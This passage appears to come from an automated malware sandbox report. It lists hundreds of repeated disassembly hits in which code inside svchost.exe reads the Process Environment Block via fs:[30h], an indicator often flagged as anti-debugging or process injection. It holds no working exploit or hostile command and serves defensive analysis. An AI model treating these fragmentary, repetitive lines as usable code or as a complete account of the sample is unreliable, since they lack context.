            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]2_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]2_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]2_2_03064588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]2_2_0306E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]2_2_030365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]2_2_030325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]2_2_0302C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]2_2_0306A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]2_2_030EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]2_2_0302645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]2_2_0305245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]2_2_030BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]2_2_030EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]2_2_030364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]2_2_030644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]2_2_030BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]2_2_030304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h]2_2_03104B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]2_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]2_2_030D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028B50 mov eax, dword ptr fs:[00000030h]2_2_03028B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]2_2_030DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]2_2_0302CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]
